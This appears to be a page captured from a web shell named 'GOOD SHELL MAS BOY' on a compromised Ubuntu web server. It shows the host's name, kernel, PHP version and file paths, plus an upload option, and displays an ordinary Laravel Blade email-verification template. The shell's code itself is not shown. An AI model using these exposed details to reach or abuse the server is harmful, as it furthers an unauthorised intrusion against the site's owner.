GOOD SHELL MAS BOY
Server: Apache/2.4.52 (Ubuntu)
System: Linux vmi1836763.contaboserver.net 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
User: www-data (33)
PHP: 8.4.10
Disabled: NONE
Upload Files
File: /var/www/html/storage/framework/views/0b44358799fea84f99e30d37527a7139.php
<?php $__env->startSection('title', 'Verify Email'); ?>
<?php $__env->startSection('main'); ?>
<style>
    @media (max-width: 767px) {
        .image-section-container {
            display: none;
        }
    }
</style>
<section class="our-register">
    <div class="container">
        <div class="row wow fadeInRight" data-wow-delay="300ms">
            <div class="col-lg-6 image-section-container">
                <div class="image-section">
                    <img src="<?php echo e(asset('images/background/login.png')); ?>" loading="lazy" alt="Welcome Image" style="width: 100%; border-radius: 8px;">
                </div>
            </div>
            <?php
$__split = function ($name, $params = []) {
    return [$name, $params];
};
[$__name, $__params] = $__split('auth.verify-account-email');

$__html = app('livewire')->mount($__name, $__params, 'lw-1597255940-0', $__slots ?? [], get_defined_vars());

echo $__html;

unset($__html);
unset($__name);
unset($__params);
unset($__split);
if (isset($__slots)) unset($__slots);
?>
        </div>
    </div>
</section>
<?php $__env->stopSection(); ?>
<?php echo $__env->make('layouts.main', array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?><?php /**PATH /var/www/html/resources/views/auth/verify-account-email.blade.php ENDPATH**/ ?>